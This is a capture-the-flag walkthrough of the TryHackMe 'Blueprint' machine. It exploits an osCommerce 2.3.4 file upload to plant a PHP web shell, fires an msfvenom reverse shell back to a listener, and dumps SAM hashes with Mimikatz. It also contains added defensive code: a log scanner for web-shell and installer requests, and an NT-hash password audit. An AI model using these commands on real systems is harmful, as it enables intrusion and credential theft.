TryHackMe "Blueprint" Exploitation - No Metasploit Version
Blueprint, another Windows challenge from TryHackMe (https://tryhackme.com/room/blueprint), requires the user to use their scanning and enumeration skills, along with being curious enough to click through links and directories to be successful. In today's walkthrough we will show you the manual way to exploit this Windows machine, secure the required NTLM hash, and find the Root flag for submission. So let's get started!
Scanning
As usual, let's run our Nmap scan followed by the -A scan for additional information.
nmap 10.10.43.200
nmap -A -p80,135,139,445,3306,8080 10.10.43.200
The machine is pretty straightforward: a combination of SMB and web server elements. Of note is the MariaDB server running on 3306, which suggests there is a database backing an application on the frontend. Either way, now that we know what we are looking at, let's enumerate.
Enumeration
I usually go for the web servers first to see what is happening there. The port 80/443 server revealed nothing, however a visit to the 8080 port address showed the following.
10.10.43.200:8080 with information disclosure
As we see, the banner information is available, as well as a folder called "oscommerce-2.3.4". If we click on this we are taken to the following directory.
Clicking the catalog/ directory moves us further into the website, showing us at least a partial view of the site's contents (several assets fail to load).
/catalog/ directory with website contents
Unfortunately our path slows here. Let's quickly run Dirsearch to see if we can find any subdirectories of interest.
python3 dirsearch.py -u http://10.10.43.200:8080/oscommerce-2.3.4 -e php,cgi,html,txt,exe -x 400,401,403 -r -R 3 -t 100
Interesting /install directory found
We really need to dig deeper into the oscommerce-2.3.4 service itself to understand the exploitation side. A searchsploit search showed the following.
searchsploit oscommerce 2.3.4 results; Notice Arbitrary File Upload
The results show that there may be a possibility of an Arbitrary File Upload vulnerability in the service. Let's see what the exploit is all about. First we can copy it to our working directory and see what it does if we run it. After that, let's "cat" it and see what the contents tell us we need to do.
Script copy and run for help commands
cat 43191.py
If we visit that /install/ directory we found earlier, we see what appears to be a front-end dashboard that allows us to create or initiate a database. Let's start exploiting.
Exploitation
After reading the requirements for the exploit, it's clear that we need to be a privileged user in order to be successful. Since the insecure install dashboard we found is still reachable, we can attempt to create that user ourselves. We begin by clicking start.
Dashboard to allow installation and configuration of database
So this is obviously interesting. We shouldn't normally have the ability to initiate this ourselves. Clicking start moves us another step.
Basic Server settings
Initialization message
Results; Click continue
Credential creation
PHP script to allow browser address bar RCE
Now we can start with the exploit and attempt to upload it.
python 43191.py -u http://10.10.43.200:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
We run the command and see that the upload was successful. Additionally we are provided with a link that we can utilize in our browser. Let's head to our browser and try to use our PHP script to execute a command.
/shell.php?cmd=whoami
And we have been successful not only with the upload, but also with the Remote Code Execution. We see that we are running as a system user, and we know that we have file upload abilities. Let's write an msfvenom payload that gives us a reverse shell, and then run it.
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.198 LPORT=5555 -f exe > shell.exe; Note the python exploit command as well
Now all we need to do is start a Netcat listener to catch the shell, and visit the link we were given above to fire it off.
nc -nlvp 5555 to reverse shell; Visited link in Browser to execute command
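From the defender's side, the whole path above leaves two clear footprints in the web server's access log: requests to an osCommerce /install/ directory that should have been deleted after setup, and requests to a .php file carrying a cmd= parameter, exactly the /shell.php?cmd=whoami pattern used here. The following is an added detection example (not part of the original walkthrough or of osCommerce) that scans Apache combined-format log lines for both signals; it also flags failed probes of the installer (non-2xx) as a weaker finding, which goes slightly beyond the page. The log lines, IPs, and the shell.php path are constructed for the example.

```python
"""Detection example: flag leftover-installer access and web-shell command
requests in Apache combined-format access logs. Added example, not code from
the original post or from osCommerce. All sample log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# combined format: ip ident user [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameter names treated as a command channel. The page shows "cmd";
# extend this tuple for other web-shell conventions seen in your environment.
COMMAND_PARAMS = ("cmd",)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return a finding label for one parsed request, or None if it looks benign."""
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    query = parse_qs(parts.query)

    # Signal 1: the setup wizard is still on disk. A 2xx means it was actually
    # served, so anyone can re-run installation and create an admin account.
    if "/install/" in path or path.endswith("/install"):
        if 200 <= entry["status"] < 300:
            return "installer-reachable"
        return "installer-probe"          # asked for, but not served

    # Signal 2: a PHP resource invoked with a command parameter (web shell).
    if path.endswith(".php") and any(k.lower() in COMMAND_PARAMS for k in query):
        return "webshell-command"
    return None


def scan(lines):
    """Run classify() over raw log lines; return (label, ip, method, target, status) tuples."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((label, entry["ip"], entry["method"], entry["target"], entry["status"]))
    return findings


# Constructed sample log (hypothetical hosts and paths; shell.php location is assumed).
SAMPLE_LOG = """\
10.11.1.198 - - [18/Jan/2021:10:01:02 +0000] "GET /oscommerce-2.3.4/catalog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.1.198 - - [18/Jan/2021:10:01:09 +0000] "GET /oscommerce-2.3.4/install/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.11.1.198 - - [18/Jan/2021:10:02:31 +0000] "POST /oscommerce-2.3.4/install/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.11.1.198 - - [18/Jan/2021:10:05:44 +0000] "GET /oscommerce-2.3.4/catalog/shell.php?cmd=whoami HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.11.1.50 - - [18/Jan/2021:10:06:00 +0000] "GET /oscommerce-2.3.4/catalog/product_info.php?products_id=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.11.1.77 - - [18/Jan/2021:10:07:15 +0000] "GET /oscommerce-2.3.4/install/ HTTP/1.1" 404 300 "-" "curl/7.68"
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Any "installer-reachable" hit is a misconfiguration finding on its own, independent of whether an attacker followed up: the fix is to delete the install directory after setup, as osCommerce itself advises, and to put the admin area behind authentication at the web server layer. The "webshell-command" rule is deliberately narrow (a .php target plus a command parameter) so it stays quiet on normal catalog traffic like the product_info.php request.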
And we now have system-level shell access to the machine. The rest of the challenge is mostly trivial, and I will walk you through how to grab the NTLM hash and the final flag. First, we can once again use our exploit to upload a tool called "Mimikatz," which should be on your machine by default (run locate mimikatz from a terminal in Kali to find it). But first, we need to know the system architecture of the target machine, as Mimikatz comes in x64 and x86 versions. Let's do that quickly using systeminfo.
systeminfo x86 architecture shown
Now that we know our architecture we can grab the correct version of Mimikatz, copy it to our working directory, and use the exploit to upload it. Additionally we can check the directory to ensure it uploaded properly, as shown below.
Mimikatz uploaded and confirmed
Mimikatz is a complex tool that we won't cover in much detail today. For the purpose of our challenge, we will simply execute it to get the Mimikatz prompt, and then run lsadump::sam to reveal the hashes.
mimikatz_x86.exe; lsadump::sam
Great! We now have the hash that we need for the challenge. Copy it and crack it. In this instance, I go for quick wins and try a few different online hash cracking sites to find it. CrackStation had this one already.
CrackStation has cracked
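The reason a lookup site had this hash "already" is worth understanding: an NT hash is plain MD4 over the UTF-16LE encoding of the password, with no salt, so every account on every machine that uses the same password has the identical hash and a single precomputed table answers all of them. The following added example (not part of the original post, and not Mimikatz or CrackStation code) implements NT hashing from scratch and uses it the way a defender would: checking a list of dumped hashes against a banned-password list during a password audit. MD4 is written out in pure Python because hashlib's md4 is frequently disabled under OpenSSL 3. The account names, hashes and banned-password list are constructed for the example.

```python
"""NT hash computation and a banned-password audit. Added example, not code from
the original post; account list and banned list below are constructed."""
import struct


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. Pure Python so it works where hashlib lacks md4."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    F = lambda x, y, z: (x & y) | (~x & z)          # round 1 boolean function
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2 (majority)
    H = lambda x, y, z: x ^ y ^ z                    # round 3 (parity)

    # Padding: 0x80, zeros until length is 56 mod 64, then 64-bit LE bit count.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each step updates register a, then rotates (a,b,c,d) -> (d,a',b,c),
        # which reproduces the ABCD/DABC/CDAB/BCDA register order of the RFC.
        for i in range(16):                                   # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask,
                                 (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4                          # 0,4,8,12,1,5,...
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask,
                                 (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]   # 0,8,4,12,2,10,...
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask,
                                 (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex. No salt, no iteration."""
    return md4(password.encode("utf-16-le")).hex()


def build_lookup(banned_passwords):
    """Precompute hash -> password once; because there is no salt this table
    is valid for every account and every machine."""
    return {nt_hash(p): p for p in banned_passwords}


def audit(accounts, lookup):
    """accounts: {username: nt_hash_hex} as exported by a SAM/AD audit.
    Returns {username: banned_password} for every account on the banned list."""
    return {user: lookup[h.lower()] for user, h in accounts.items() if h.lower() in lookup}


# Constructed banned list (the empty string catches blank passwords).
BANNED = ["", "password", "Password1", "Welcome1", "letmein"]

# Constructed audit input: two well-known test vectors and one strong passphrase.
ACCOUNTS = {
    "Administrator": "8846f7eaee8fb117ad06bdd830b7586c",  # NT hash of "password"
    "Guest": "31d6cfe0d16ae931b73c59d7e0c089c0",          # NT hash of "" (blank)
    "svc_backup": nt_hash("correct-horse-battery-staple-2021!"),  # not on the list
}

if __name__ == "__main__":
    for user, pw in audit(ACCOUNTS, build_lookup(BANNED)).items():
        print(f"{user}: banned password {pw!r}")
```

The audit needs only one MD4 per banned password regardless of how many accounts are checked, which is the same property that makes public lookup tables work against dumped SAM hashes. Mitigations that follow directly: long, non-dictionary passwords, LAPS or an equivalent so local Administrator passwords are unique per host, and Credential Guard or restricted LSA access so the hashes are not dumpable in the first place.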
Finally we need to get the root.txt flag. This is normally on the Administrator's Desktop. Changing directory there shows us the flag file. Use the more command to reveal the contents, and submit it to the dashboard. Congratulations on completing the room!
more root.txt.txt
Final Thoughts
Blueprint was another great opportunity to take what would normally be an easy Metasploit exploitation, and use a lesser traveled manual exploit instead to finish. Mimikatz is an incredibly powerful tool that can be leveraged in many ways, and I encourage you to learn about it more on your own. I hope this walkthrough guide has helped you along your way, and I'll see you next time!
Comments
What could I be doing wrong?
This was the best walkthru I could find!
Thank you!
I am VERY new to pentesting and offsec.
The hardest part of this for me was understanding what was going on with the msfvenom and python 43191 script. I had my IP addresses mixed up (wasn't sure which one went where).
The scanning and enumeration come easy to me, but it's the exploit phase where I always have a hard time understanding what's going on under the hood.
This was a great walkthrough.
Thank you again!